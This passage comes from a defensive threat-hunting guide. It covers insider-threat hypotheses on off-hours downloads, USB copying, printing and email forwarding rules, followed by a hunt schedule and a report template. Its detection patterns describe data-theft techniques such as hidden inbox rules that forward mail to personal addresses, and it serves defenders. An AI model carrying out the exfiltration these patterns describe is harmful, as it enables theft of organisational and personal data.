Hunt Method: Alert on: new application registrations by non-IT accounts; Add delegated permission grant events for broad permissions (Mail.ReadWrite, Files.ReadWrite.All, User.ReadWrite.All); new credentials (client secrets or certificates) added to existing service principals; and Add app role assignment to service principal where the role is privileged. Detect "illicit consent grant" attack: user-level consent for high-privilege delegated permissions.

Key Observables:

• New OAuth app registered with Mail.ReadWrite or Mail.Send permissions
• User consent granted to app requesting User.ReadWrite.All (admin-only permission)
• Client secret added to existing high-privilege service principal by non-owner
• New federated identity credential on service principal (enables OIDC token impersonation)
• Service principal added to Global Administrator or Exchange Administrator role

False Positive Sources: Legitimate developer app registrations (enforce via app governance policy); authorized service account setup; ISV/partner application provisioning.

Insider Threat Hypotheses¶

HYP-052 — Off-Hours Mass File Download¶

Hypothesis: A malicious or compromised insider may be downloading large volumes of sensitive data outside normal business hours in preparation for departure or exfiltration which would be observable in file access, DLP, and web proxy logs as significantly above-baseline file access and download activity between 20:00-06:00 local time.

Data Sources:

• File server access audit logs (Event ID 4663)
• DLP solution (classification-based file access)
• Web proxy (cloud upload detection)
• HR system (resigned employee flags, PIPs)

Hunt Method: Correlate file access patterns with HR risk flags (recently submitted resignation, placed on PIP, disciplinary action). For all users, establish a 30-day baseline of file access count and volume during off-hours. Alert on any user accessing more than 3 standard deviations above their off-hours baseline. Weight alerts by data classification — access to IP or PII repositories carries higher priority than general file shares.

Key Observables:

• User with HR risk flag: >500 file reads between 22:00-05:00
• Downloads of files tagged as Confidential or higher in DLP system
• Email to personal address (Gmail, Yahoo) with attached files from work system
• Cloud upload (OneDrive personal, Google Drive, Dropbox personal) from work device
• Bulk file copy to local Desktop or Downloads folder (staging behavior)

False Positive Sources: Remote workers in different time zones; on-call staff during incidents; executives with unusual work hours; IT staff performing maintenance tasks after hours.

HYP-053 — USB Write Activity for Data Theft¶

Hypothesis: A malicious insider may be copying sensitive data to removable USB storage which would be observable in Windows device event logs and DLP telemetry as removable media insertion events followed by large file copy operations to the removable drive from a user associated with a termination or security risk flag.

Data Sources:

• Windows Event ID 2003 (Removable storage device connected)
• Windows Event ID 6416 (New external device recognized)
• DLP USB monitoring alerts
• File copy events to removable drive letter (DLP, EDR)

Hunt Method: Alert on USB insertion events from endpoints belonging to: HR-flagged employees; employees in roles with access to highly classified data; users who have received security notices. For all endpoints, flag USB insertions outside business hours or in secure areas where USB should be blocked. Monitor file copy events to USB drive letters — particularly for files with sensitive classification tags.

Key Observables:

• Event ID 6416 from endpoint of recently resigned employee
• File copy of >1GB to removable drive in single session
• USB insertion at 23:00 from employee with resignation notice
• Copy of files matching DLP policy (SSN patterns, financial keywords, source code) to USB
• USB device not in corporate-approved hardware inventory (Device ID not whitelisted)

False Positive Sources: IT staff using USB for system imaging; authorized removable media for air-gapped transfers; employees with business-approved removable storage (document hardware inventory).

HYP-054 — Anomalous Print Spooling of Sensitive Documents¶

Hypothesis: A malicious insider may be printing sensitive documents for physical exfiltration which would be observable in print server logs and DLP monitoring as a significant increase in print volume from an at-risk user, particularly for documents containing sensitive classification markers.

Data Sources:

• Windows Print Server event logs (Event ID 307 — Document printed)
• DLP content inspection on print jobs
• Microsoft 365 sensitivity label audit logs
• HR system risk flags

Hunt Method: Enable Print Server audit logging (Event ID 307 in Microsoft-Windows-PrintService/Operational). Establish per-user print volume baseline. Alert on: print volume exceeding 3x user's 30-day average in a single day; printing of documents with Confidential or higher sensitivity label; printing from accounts on HR watch list; print jobs outside business hours (18:00-08:00). Note: physical cameras in print rooms are a complementary control.

Key Observables:

• Event ID 307: User prints >50 pages in one session (anomalous for most roles)
• Print job for document with sensitivity label "Highly Confidential"
• Print at 02:00 from badge-tracked user in the building
• Multiple large print jobs over 5 consecutive days (exfil pattern)
• Printing of complete customer database or HR file list (unusual document types for role)

False Positive Sources: End-of-month financial reporting; legal discovery document printing; HR functions requiring paper documentation; approved bulk print jobs for mailers.

HYP-055 — Corporate Email Forwarding Rule for Data Exfiltration¶

Hypothesis: A malicious insider or compromised account may have configured email forwarding rules to send corporate email to an external personal address which would be observable in Exchange/Microsoft 365 audit logs as inbox rule creation events that forward, redirect, or copy messages to external addresses.

Data Sources:

• Microsoft 365 Unified Audit Log (Exchange mailbox audit)
• Exchange Server PowerShell audit logs
• Entra ID sign-in logs (correlating who set the rule)

Hunt Method: Query the M365 Unified Audit Log for New-InboxRule and Set-InboxRule operations where ForwardTo, ForwardAsAttachmentTo, or RedirectTo resolves to an external domain. Run this query continuously as a detection rule. Also hunt for existing rules across all mailboxes — Get-InboxRule sweep for any rule that forwards externally. Alert on rules that also DeleteMessage or move to a specific folder (designed to hide the forwarding from the user).

Key Observables:

• New-InboxRule with ForwardTo: [name]@gmail.com or other personal domain
• Rule condition: BodyContainsWords: ["confidential", "password", "invoice"] + external forward
• Rule action: DeleteMessage: True (forwards and deletes, user may not notice)
• Auto-forwarding to competitor domain
• Rule created from unfamiliar IP or at unusual time for that user

False Positive Sources: Employees with business-approved email forwarding to personal devices; executives using external email systems; authorized IT rules for specific workflows (document and baseline all known-good forwarding rules).

Hunt Prioritization Matrix¶

The following matrix rates hypotheses by the combination of likelihood (how often this TTP is observed in the wild) and impact (potential damage if successful), producing a risk score to guide scheduling.

Scoring Guide: Likelihood × Impact, scaled 1-10. Very High = 5, High = 4, Medium = 3, Low = 2. Impact: Critical = 2x, High = 1.5x, Medium = 1x.

Hunt Scheduling Recommendations¶

Weekly Hunts (Critical & High Priority Score ≥ 8)¶

Execute these every week, rotating through the list. High-fidelity, time-sensitive threats.

Monthly Hunts (Medium Priority Score 6-7)¶

Execute these once per month. Longer burn TTPs and techniques with lower base rate.

• HYP-006: PowerShell Obfuscation
• HYP-007: LOLBin Abuse
• HYP-008: WMI Execution
• HYP-011: Scheduled Task Persistence
• HYP-012: WMI Subscription Persistence
• HYP-025: Password Spraying (AD)
• HYP-027: BloodHound / AD Enumeration
• HYP-028: Internal Network Scanning
• HYP-031: PsExec-Style Execution
• HYP-032: WinRM Lateral Movement
• HYP-033: RDP Tunneling
• HYP-034: SMB Relay
• HYP-035: Mass File Access
• HYP-038: DNS Tunneling
• HYP-039: HTTPS Exfil to Young Domains
• HYP-046: Backup Destruction
• HYP-048: S3 Data Exfil
• HYP-049: Lambda Persistence
• HYP-051: Azure AD App Abuse
• HYP-052: Off-Hours Mass Download

Quarterly Hunts (Coverage Validation, Priority Score ≤ 5)¶

Execute these quarterly to validate detection coverage and update baselines.

• HYP-004: Drive-By Compromise
• HYP-005: Web Application Exploitation
• HYP-009: WSH/VBScript Execution
• HYP-013: Startup Folder Persistence
• HYP-014: Bootkit / MBR Persistence
• HYP-015: Token Manipulation
• HYP-016: DLL Hijacking
• HYP-017: Unquoted Service Path
• HYP-021: Timestomping
• HYP-023: AS-REP Roasting
• HYP-029: Account Enumeration
• HYP-036: Screen Capture / Keylogging
• HYP-042: C2 over DNS
• HYP-043: ICMP Tunneling
• HYP-045: Disk Wiper
• HYP-050: Azure AD Conditional Access Bypass
• HYP-053: USB Exfiltration
• HYP-054: Anomalous Print Jobs
• HYP-055: Email Forwarding Rules

Hunt Documentation Template¶

Copy this template for each hunt conducted. Store completed templates in your organization's hunt log (wiki, SharePoint, Confluence, or ticketing system).

# Threat Hunt Report

## Hunt Metadata

| Field | Value |
|---|---|
| **Hunt ID** | HUNT-[YYYY]-[NNN] (e.g., HUNT-2024-047) |
| **Hypothesis ID** | HYP-XXX |
| **Hypothesis Statement** | [Full hypothesis statement] |
| **Hunt Date(s)** | YYYY-MM-DD — YYYY-MM-DD |
| **Lead Analyst** | [Name / Handle] |
| **Supporting Analysts** | [Names] |
| **Hunt Duration** | [Hours spent] |
| **Environment Scope** | [Domain / Cloud tenant / BU / All] |
| **Time Range Analyzed** | [Start datetime] — [End datetime] |

---

## Pre-Hunt Assessment

### Threat Intelligence Context
[What recent TI, incident reports, or threat actor activity prompted or supports this hypothesis?]

### Environment Context
[Any known configuration, logging gaps, or baseline anomalies relevant to this hunt?]

### Data Sources Available
- [ ] Endpoint process creation logs
- [ ] Network flow / proxy logs
- [ ] Authentication logs (DC / Entra ID / Okta)
- [ ] DNS query logs
- [ ] Cloud audit logs (CloudTrail / Azure Monitor)
- [ ] EDR telemetry
- [ ] [Other: ]

### Data Sources Missing / Incomplete
[List any logging gaps discovered during hunt preparation. These are findings regardless of threat outcome.]

---

## Hunt Methodology

### Queries Executed

**Query 1: [Name]**

Result count: [N] | Reviewed: [N] | Escalated: [N]

**Query 2: [Name]**

Result count: [N] | Reviewed: [N] | Escalated: [N]

*(Add additional queries as needed)*

### Pivot Analysis
[Describe any pivots made from initial findings — e.g., "Found anomalous IP, pivoted to all connections from that IP in 30-day window"]

---

## Findings

### Confirmed Threat Activity
*Complete this section if a threat was confirmed.*

| Field | Value |
|---|---|
| **Verdict** | CONFIRMED THREAT |
| **Affected Hosts** | [Hostnames / IPs] |
| **Affected Accounts** | [Usernames] |
| **Earliest Evidence** | [Timestamp] |
| **Latest Evidence** | [Timestamp] |
| **Attacker Actions Observed** | [Summary] |
| **MITRE ATT&CK Techniques** | [T-numbers] |

**Incident Ticket:** [Link to IR ticket]

### Suspicious Activity Requiring Follow-Up
*Complete this section for items not conclusively confirmed or ruled out.*

| Item | Description | Owner | Due Date |
|---|---|---|---|
| [1] | [Description] | [Analyst] | [Date] |

### False Positives Identified
[Document benign activity that triggered the hunt queries. Use this to tune detections.]

| Pattern | Root Cause | Tuning Action |
|---|---|---|
| [Pattern observed] | [Why it's benign] | [Filter/exclusion to add] |

---

## Hunt Outcome

| Field | Value |
|---|---|
| **Verdict** | [ ] Threat Confirmed / [ ] Suspicious (Follow-Up) / [ ] No Threat Found |
| **Coverage Validated?** | [ ] Yes — detection coverage confirmed / [ ] No — gaps identified |
| **Detections to Create** | [List new detection rules identified during hunt] |
| **Detections to Tune** | [List existing detections to adjust based on FPs found] |
| **Logging Gaps Found** | [Data sources missing that would have improved hunt] |

---

## Recommendations

### Immediate Actions (< 48 hours)
1. [Action item]

### Short-Term Actions (< 30 days)
1. [Action item]

### Long-Term Improvements (< 90 days)
1. [Action item]

---

## Hunt Metrics

| Metric | Value |
|---|---|
| Total events reviewed | [N] |
| Time to hypothesis | [H hours] |
| Time to first lead | [H hours] |
| Total analyst hours | [H hours] |
| Detections created | [N] |
| FP rules tuned | [N] |
| MTTD improvement (if confirmed threat) | Baseline [X days] → Hunt [Y days] |

---

*Hunt conducted by: [Team Name] | Template version: 1.0 | Aligned to MITRE ATT&CK v15*

Cross-Reference Index¶

By MITRE ATT&CK Tactic¶

By Data Source Required¶

This library is aligned to MITRE ATT&CK v15. For chapter references, see the Nexus SecOps Textbook table of contents. Submit new hypotheses and updates via pull request to the Nexus SecOps-Textbook repository.